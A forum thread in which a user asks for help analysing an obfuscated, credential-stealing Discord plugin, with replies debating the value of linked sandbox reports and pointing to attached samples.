SciT Posted July 30, 2021 Posted July 30, 2021 (edited) Hi. Literally an hour ago, a massive phishing link was sent on the discord across all private messages and servers, which is why many channels blocked me and / or muddied me. I remembered that some time ago I came across the so-called Discord Perks that improve the user experience. And last time I was not embarrassed by the fact that I load extraneous scripts without proper analysis. I found the files that I downloaded, began to analyze in more detail and found too suspicious and obvious malware insertions. Could you help de-obfuscate the part that was obfuscated to understand where and how the data was sent? A large number of people were affected by this plugin, as they saw ads on other resources, including videos. The presence of such keywords as: POST, ip, token, authToken, userEmail, email, log, data, etc. NitroPerks.plugin.js Edited July 30, 2021 by SciT eng formating
SciT Posted August 10, 2021 Author Posted August 10, 2021 Up. Help find out if other accounts have been affected. Perhaps all the cookies were stolen, I cannot find out.
RDGMax Posted August 10, 2021 Posted August 10, 2021 https://www.hybrid-analysis.com/sample/15b45f8c4732f81361ba51a14b8664f5532e22defa9597de99b55e3a0d263b5a/6112712dcc5bc6285509d939#mitre-matrix-modal
kao Posted August 10, 2021 Posted August 10, 2021 @RDGMax: Did you even look at the results before you posted them? That sandbox output is completely useless. Sandbox tried to run the file using WScript and failed spectacularly. All the important code is well protected and can't be extracted this way.
RDGMax Posted August 10, 2021 Posted August 10, 2021 48 minutes ago, kao said: @RDGMax: Did you even look at the results before you posted them? That sandbox output is completely useless. Sandbox tried to run the file using WScript and failed spectacularly. All the important code is well protected and can't be extracted this way. you don't see anything??? 🙈 that analysis is very useful for me. to take a decision.to classify as malware
kao Posted August 12, 2021 Posted August 12, 2021 No, I don't see anything malicious there, for the reasons explained above. If you disagree, I kindly invite you to show *exactly* where and what is to be considered malicious. On 8/10/2021 at 4:01 PM, RDGMax said: that analysis is very useful for me. to take a decision.to classify as malware #1 - OP has already established that this file is malicious - that was not the question. The question was - what was stolen+how and where it was sent to? #2 - Would you call this file malicious too? (see attachment) https://www.hybrid-analysis.com/sample/017d4223a35619fe0002007e32e889796598846d8a131b8fd1cd3d0057c6fbb3/611556f3da7fb81f775036f1 1d10ts-v2.zip
RDGMax Posted August 12, 2021 Posted August 12, 2021 The main file is a downloader here a file downloaded .. there are dozens of files. I think the file has been infected by some other software nitro2.rar 1
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now